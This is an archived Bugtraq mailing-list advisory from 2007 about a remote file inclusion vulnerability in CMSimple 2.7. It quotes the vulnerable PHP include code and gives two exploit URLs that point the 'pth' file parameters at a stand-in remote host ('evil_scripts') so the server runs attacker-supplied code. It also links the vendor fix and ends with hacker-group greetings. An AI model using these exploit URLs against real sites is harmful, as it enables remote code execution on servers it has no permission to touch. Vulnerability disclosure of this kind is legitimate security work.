Bugtraq mailing list archives
cmsimple 2.7 Remote File Include
From: "mr alkomandoz" <k3g () hackermail com>
Date: Sun, 21 Jan 2007 05:29:07 +0800
----------------------------------------------- cmsimple 2.7 Remote File Include ----------------------------------------------- Author: Alk()mand()z ----------------------------------------------- Vuln Code: if (!@ include ($pth['file']['plugin_index'])) {if(@include($pth['file']['image']))exit;} ----------------------------------------------- 3xplo!t: cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts? cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts? ----------------------------------------------- download: http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip ----------------------------------------------- Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team ################################## AsB-MaY.NeT & MoHaNdKo.CoM ################################## -- _______________________________________________ Get your free email from http://www.hackermail.com
Current thread:
- cmsimple 2.7 Remote File Include mr alkomandoz (Jan 22)